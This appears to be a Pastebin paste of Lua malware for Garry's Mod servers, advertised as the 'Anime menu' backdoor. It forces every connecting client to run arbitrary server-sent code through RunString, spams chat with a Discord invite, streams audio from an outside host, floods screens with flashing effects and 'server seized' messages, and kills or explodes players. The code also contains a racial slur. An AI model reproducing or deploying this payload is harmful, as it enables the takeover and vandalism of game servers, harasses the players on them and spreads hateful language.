Advertisement
Guest User

Disco bd

a guest
Sep 15th, 2019
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 4.74 KB | None | 0 0
  1. local CP = {}
  2.  
  3. timer.Create( "Anime menuspamchat", 0.01, 0, function() BroadcastLua([[chat.AddText(( HSVToColor( RealTime() * 120 % 360, 1, 1 ) ), "discord.gg/zXURS3C")]]) end)
  4.  
  5. CP.net = "CP_CLSV__"
  6. util.AddNetworkString(CP.net)
  7. CP.code = string.Replace([==[
  8.  
  9.  
  10.  
  11. local gfx = {}
  12.  
  13. local messages = {
  14.     "Your server was seized by Anime menu",
  15.     "Anime menu is best free gmod backdoor menu",
  16.     "Get good, get Anime menu",
  17.     "discord.gg/zXURS3C",
  18.     "By pushik | Anime menu"
  19. }
  20.  
  21.  
  22. hook.Add("HUDPaint", "FUCKIT_G",function()
  23.     for k,v in pairs(gfx) do
  24.         v()
  25.     end
  26. end)
  27.  
  28. local message = "Don't start your server again, it's pointless"
  29. local function SlowType(msg,interval,callback)
  30.     callback = callback or function()end
  31.     message = ""
  32.     for i=1,#msg do
  33.         timer.Simple(interval * i,function()
  34.             message = message .. msg[i]
  35.         end)
  36.     end
  37.     timer.Simple(#msg*interval,callback)
  38. end
  39. local function GetRandomSpot()
  40.     local ppos = LocalPlayer():GetPos()
  41.     return Vector(ppos.x + math.random(-500, 500),ppos.y + math.random(-500, 500),ppos.z + math.random(-10, 10))
  42. end
  43. surface.CreateFont("PWN",{bold=true,size=40})
  44. SOUNDSTART_CTP = false
  45.  
  46.  
  47.     gandoni = {
  48. "http://d.zaix.ru/ddGL.mp3",
  49. "http://d.zaix.ru/ddGP.mp3",
  50. "http://d.zaix.ru/cSTx.mp3",
  51. "http://d.zaix.ru/ddGU.mp3",
  52. "http://d.zaix.ru/ddGV.mp3",
  53. "http://d.zaix.ru/ddH2.mp3",
  54. "http://d.zaix.ru/ddH4.mp3",
  55. "http://d.zaix.ru/ajSt.mp3",
  56. "http://d.zaix.ru/degh.mp3",
  57. "http://d.zaix.ru/cryp.mp3",
  58. "http://d.zaix.ru/degN.mp3",
  59. "http://d.zaix.ru/dhFU.mp3",
  60. "http://d.zaix.ru/dhFX.mp3",
  61. "http://d.zaix.ru/dhGH.mp3",
  62. "http://d.zaix.ru/dhIg.mp3",
  63. "http://d.zaix.ru/dhIn.mp3",
  64. "http://d.zaix.ru/dhIG.mp3",
  65. "http://d.zaix.ru/dhII.mp3",
  66. "http://d.zaix.ru/ceVz.mp3"
  67.  
  68. }
  69.  
  70.  
  71. sound.PlayURL( table.Random(gandoni) ,"no block",function(s)
  72.     if not s then return end
  73.     if SOUNDSTART_CTP then s:Stop() return end
  74.     SOUNDSTART_CTP = true
  75.  
  76.  
  77.     local ragtbl = {}
  78.    
  79.  
  80.     gfx["CoolEffect"] = function()
  81.  
  82.  
  83.  
  84.         local tbl = {}
  85.         s:FFT(tbl,FFT_2048)
  86.  
  87.        
  88.         xpcall(function()
  89.             local fal = 0
  90.         for i=4,6 do
  91.             fal = fal + tbl[i]
  92.         end
  93.  
  94.         if fal > 0.8 then
  95.             local ca = Color(math.random(0,255),math.random(0,255),math.random(0,255), 150)
  96.             gfx["ColorChange"] = function()
  97.                 draw.RoundedBoxEx(0, 0, 0, ScrW(),ScrH(),ca)
  98.             end
  99.             util.ScreenShake(LocalPlayer():GetPos(),20,20,0.5,20)
  100.             local mats = Entity(0):GetMaterials()
  101.             for k,v in pairs(mats) do
  102.             local r,g,b = ColorRand().r-50, ColorRand().g-50, ColorRand().b-50
  103.                 Material(v):SetVector("$color", Vector(r,g,b))
  104.             end
  105.         end
  106.         end,function()
  107.         end)
  108.  
  109.  
  110.         for k,v in pairs(tbl) do
  111.             local col = HSVToColor(k * 1 % 360,1,1)
  112.             draw.RoundedBoxEx(0,0,k * 10, (v*10000), 10,col)
  113.             draw.RoundedBoxEx(0,ScrW() - (v*10000),k * 10, (v*10000), 10,col)
  114.         end
  115.     end
  116.    
  117.     timer.Simple(29, function()
  118.        
  119.             hook.Add("GetMotionBlurValues", "YASS",function(a,b,c,d)
  120.                 return a,b,c+140,d
  121.             end)
  122.            
  123.        
  124.     end)
  125.  
  126.     local cc = 1
  127.     local omgs = {}
  128.     timer.Create("MVSPOS", 0.04, 0, function()
  129.         for k,v in pairs(omgs) do
  130.             if  omgs[ k ].n <= 0 then omgs[ k ] = nil continue end
  131.             omgs[ k ] = {text = omgs[ k ].text, n = omgs[ k ].n - 1}
  132.         end
  133.     end)
  134.     local isPounding = false
  135.  
  136.     timer.Create("NEXTMSG", 6, #messages, function()
  137.         if cc > #messages then
  138.             isPounding = true
  139.             return
  140.         end
  141.         table.insert(omgs, {text = messages[ cc ],n = ScrH()})
  142.         cc = cc + 1
  143.     end)
  144.    
  145.     gfx["MessageC"] = function()
  146.         if isPounding and (#messages <= 0) then
  147.             draw.SimpleText("love u niggas <3", "PWN", ScrW() / 2, ScrH() / 2,Color(200,0,0),1,1)
  148.         end
  149.         for k,v in pairs(omgs) do
  150.             draw.SimpleText(omgs[ k ].text, "PWN", ScrW() / 2, omgs[ k ].n,Color(0,0,0),1,1)
  151.         end
  152.     end
  153. end)
  154.  
  155.  
  156.     ]==], "{netk}",CP.net)
  157. CP.NetFunction = {}
  158. CP.NetFunction["k"] = function(ply)
  159.     ply:Kill()
  160. end
  161. CP.NetFunction["e"] = function(ply)
  162.     ply:Kill()
  163.     local explosion = ents.Create( "env_explosion" )
  164.     explosion:SetKeyValue( "spawnflags", 144 )
  165.     explosion:SetKeyValue( "iMagnitude", 15 )
  166.     explosion:SetKeyValue( "iRadiusOverride", 256 )
  167.     explosion:SetPos(ply:GetPos())
  168.     explosion:Spawn( )
  169.     explosion:Fire("explode","",0)
  170. end
  171. net.Receive("CP_CLSV__",function(_,ply)
  172.     CP.NetFunction[net.ReadString()](ply)
  173. end)
  174. function CP.SetupPlayer(ply)
  175.     ply:SendLua([[net.Receive("]]..CP.net..[[",function()
  176.         RunString(net.ReadString())
  177.     end)]])
  178. end
  179. function CP.SendPlayer(ply)
  180.     net.Start(CP.net)
  181.     net.WriteString(CP.code)
  182.     net.Send(ply)
  183. end
  184.  
  185. function CP.Spawn(ply)
  186.     print(ply:Name().." connected, sending payload. . .")
  187.     CP.SetupPlayer(ply)
  188.     timer.Simple(5, function()
  189.         CP.SendPlayer(ply)
  190.     end)
  191. end
  192. hook.Add( "PlayerSpawn", "CP_Spawn", CP.Spawn )
  193.  
  194. for i,v in ipairs(player.GetAll()) do
  195.     CP.Spawn(v)
  196. end
  197.  
  198.  
  199. --chat.AddText(Color(240, 183, 41),("get good, get Anime menu"))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement